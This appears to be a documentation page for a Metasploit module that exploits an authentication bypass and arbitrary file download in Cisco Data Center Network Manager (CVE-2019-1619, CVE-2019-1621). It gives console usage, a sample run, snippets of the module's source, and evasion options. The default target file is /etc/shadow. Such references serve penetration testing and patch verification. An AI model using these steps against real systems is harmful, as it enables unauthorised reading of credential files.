Cisco Data Center Network Manager Unauthenticated File Download - Metasploit


This page contains detailed information about how to use the auxiliary/admin/networking/cisco_dcnm_download metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Cisco Data Center Network Manager Unauthenticated File Download
Module: auxiliary/admin/networking/cisco_dcnm_download
Source code: modules/auxiliary/admin/networking/cisco_dcnm_download.rb
Disclosure date: 2019-06-26
Last modification time: 2022-01-13 18:55:39 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2019-1619, CVE-2019-1621

DCNM exposes a servlet to download files on /fm/downloadServlet. An authenticated user can abuse this servlet to download arbitrary files as root by specifying the full path of the file. This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit (see References to understand why).

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/admin/networking/cisco_dcnm_download
msf auxiliary(cisco_dcnm_download) > show targets
    ... a list of targets ...
msf auxiliary(cisco_dcnm_download) > set TARGET target-id
msf auxiliary(cisco_dcnm_download) > show options
    ... show and set options ...
msf auxiliary(cisco_dcnm_download) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


Cisco Data Center Network Manager exposes a servlet to download files on /fm/downloadServlet. An authenticated user can abuse this servlet to download arbitrary files as root by specifying the full path of the file (aka CVE-2019-1621).

This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit (see References to understand why), on the other versions it abuses CVE-2019-1619 to bypass authentication.

Verification Steps


  1. Do: use auxiliary/admin/networking/cisco_dcnm_download
  2. Do: set rhosts [ip]
  3. Do: run

Scenarios


Setup RHOST, pick the file to download (FILENAME, default is /etc/shadow) and enjoy!

msf5 exploit > use auxiliary/admin/networking/cisco_dcnm_download

msf5 auxiliary(admin/networking/cisco_dcnm_download) > set rhost 10.75.1.40
rhost => 10.75.1.40
msf5 auxiliary(admin/networking/cisco_dcnm_download) > run

[+] 10.75.1.40:443 - Detected DCNM 10.4(2)
[*] 10.75.1.40:443 - No authentication required, ready to exploit!
[+] 10.75.1.40:443 - Got sysTime value 1567081446000
[+] 10.75.1.40:443 - Successfully authenticated our JSESSIONID cookie
[+] File saved in: /home/john/.msf4/loot/20190829122407_default_10.75.1.40_ciscoDCNM.http_855907.bin
[*] Auxiliary module execution completed

Go back to menu.

Msfconsole Usage


Here is how the admin/networking/cisco_dcnm_download auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/networking/cisco_dcnm_download

msf6 auxiliary(admin/networking/cisco_dcnm_download) > show info

       Name: Cisco Data Center Network Manager Unauthenticated File Download
     Module: auxiliary/admin/networking/cisco_dcnm_download
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2019-06-26

Provided by:
  Pedro Ribeiro <[email protected]>

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  FILEPATH   /etc/shadow      no        Path of the file to download
  PASSWORD   admin            yes       Password for auth (required only for 11.0(1)
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      443              yes       The target port (TCP)
  SSL        true             yes       Connect with TLS
  TARGETURI  /                yes       Default server path
  USERNAME   admin            yes       Username for auth (required only for 11.0(1)
  VHOST                       no        HTTP server virtual host

Description:
  DCNM exposes a servlet to download files on /fm/downloadServlet. An 
  authenticated user can abuse this servlet to download arbitrary 
  files as root by specifying the full path of the file. This module 
  was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 
  11.1(1), and should work on a few versions below 10.4(2). Only 
  version 11.0(1) requires authentication to exploit (see References 
  to understand why).

References:
  https://nvd.nist.gov/vuln/detail/CVE-2019-1619
  https://nvd.nist.gov/vuln/detail/CVE-2019-1621
  https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass
  https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-file-dwnld
  https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_download.rb
  https://seclists.org/fulldisclosure/2019/Jul/7

Module Options


This is a complete list of options available in the admin/networking/cisco_dcnm_download auxiliary module:

msf6 auxiliary(admin/networking/cisco_dcnm_download) > show options

Module options (auxiliary/admin/networking/cisco_dcnm_download):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILEPATH   /etc/shadow      no        Path of the file to download
   PASSWORD   admin            yes       Password for auth (required only for 11.0(1)
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SSL        true             yes       Connect with TLS
   TARGETURI  /                yes       Default server path
   USERNAME   admin            yes       Username for auth (required only for 11.0(1)
   VHOST                       no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the admin/networking/cisco_dcnm_download auxiliary module:

msf6 auxiliary(admin/networking/cisco_dcnm_download) > show advanced

Module advanced options (auxiliary/admin/networking/cisco_dcnm_download):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the admin/networking/cisco_dcnm_download module can do:

msf6 auxiliary(admin/networking/cisco_dcnm_download) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the admin/networking/cisco_dcnm_download auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(admin/networking/cisco_dcnm_download) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PEER> - No authentication required, ready to exploit!


Here is a relevant code snippet related to the "<PEER> - No authentication required, ready to exploit!" error message:

123:	    noauth = false
124:	
125:	    if res && res.code == 200
126:	      if res.body.include?('version":"11.1(1)')
127:	        print_good("#{peer} - Detected DCNM 11.1(1)")
128:	        print_status("#{peer} - No authentication required, ready to exploit!")
129:	        noauth = true
130:	      elsif res.body.include?('version":"11.0(1)')
131:	        print_good("#{peer} - Detected DCNM 11.0(1)")
132:	        print_status("#{peer} - Note that 11.0(1) requires valid authentication credentials to exploit")
133:	        jsession = auth_v11

<PEER> - No authentication required, ready to exploit!


Here is a relevant code snippet related to the "<PEER> - No authentication required, ready to exploit!" error message:

131:	        print_good("#{peer} - Detected DCNM 11.0(1)")
132:	        print_status("#{peer} - Note that 11.0(1) requires valid authentication credentials to exploit")
133:	        jsession = auth_v11
134:	      elsif res.body.include?('version":"10.4(2)')
135:	        print_good("#{peer} - Detected DCNM 10.4(2)")
136:	        print_status("#{peer} - No authentication required, ready to exploit!")
137:	        jsession = auth_v10
138:	      else
139:	        print_error("#{peer} - Failed to detect module version.")
140:	        print_error('Please contact module author or add the target yourself and submit a PR to the Metasploit project!')
141:	        print_error(res.body)

<PEER> - Failed to detect module version.


Here is a relevant code snippet related to the "<PEER> - Failed to detect module version." error message:

134:	      elsif res.body.include?('version":"10.4(2)')
135:	        print_good("#{peer} - Detected DCNM 10.4(2)")
136:	        print_status("#{peer} - No authentication required, ready to exploit!")
137:	        jsession = auth_v10
138:	      else
139:	        print_error("#{peer} - Failed to detect module version.")
140:	        print_error('Please contact module author or add the target yourself and submit a PR to the Metasploit project!')
141:	        print_error(res.body)
142:	        print_error("#{peer} - Trying unauthenticated method for DCNM 10.4(2) and below...")
143:	        jsession = auth_v10
144:	      end

Please contact module author or add the target yourself and submit a PR to the Metasploit project!


Here is a relevant code snippet related to the "Please contact module author or add the target yourself and submit a PR to the Metasploit project!" error message:

135:	        print_good("#{peer} - Detected DCNM 10.4(2)")
136:	        print_status("#{peer} - No authentication required, ready to exploit!")
137:	        jsession = auth_v10
138:	      else
139:	        print_error("#{peer} - Failed to detect module version.")
140:	        print_error('Please contact module author or add the target yourself and submit a PR to the Metasploit project!')
141:	        print_error(res.body)
142:	        print_error("#{peer} - Trying unauthenticated method for DCNM 10.4(2) and below...")
143:	        jsession = auth_v10
144:	      end
145:	    end

<PEER> - Trying unauthenticated method for DCNM 10.4(2) and below...


Here is a relevant code snippet related to the "<PEER> - Trying unauthenticated method for DCNM 10.4(2) and below..." error message:

137:	        jsession = auth_v10
138:	      else
139:	        print_error("#{peer} - Failed to detect module version.")
140:	        print_error('Please contact module author or add the target yourself and submit a PR to the Metasploit project!')
141:	        print_error(res.body)
142:	        print_error("#{peer} - Trying unauthenticated method for DCNM 10.4(2) and below...")
143:	        jsession = auth_v10
144:	      end
145:	    end
146:	
147:	    if jsession || noauth

Here is a relevant code snippet related to the "<PEER> - Failed to authenticate JSESSIONID cookie" error message:

145:	    end
146:	
147:	    if jsession || noauth
148:	      print_good("#{peer} - Successfully authenticated our JSESSIONID cookie")
149:	    else
150:	      fail_with(Failure::Unknown, "#{peer} - Failed to authenticate JSESSIONID cookie")
151:	    end
152:	
153:	    res = send_request_cgi(
154:	      'uri' => normalize_uri(target_uri.path, 'fm', 'downloadServlet'),
155:	      'method' => 'GET',

<PEER> - Failed to download file <FILEPATH>


Here is a relevant code snippet related to the "<PEER> - Failed to download file <FILEPATH>" error message:

169:	        'application/octet-stream',
170:	        datastore['RHOST'],
171:	        filedata,
172:	        fname
173:	      )
174:	      print_good("File saved in: #{path}")
175:	    else
176:	      fail_with(Failure::Unknown, "#{peer} - Failed to download file #{datastore['FILEPATH']}")
177:	    end
178:	  end
179:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Pedro Ribeiro <pedrib[at]gmail.com>

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.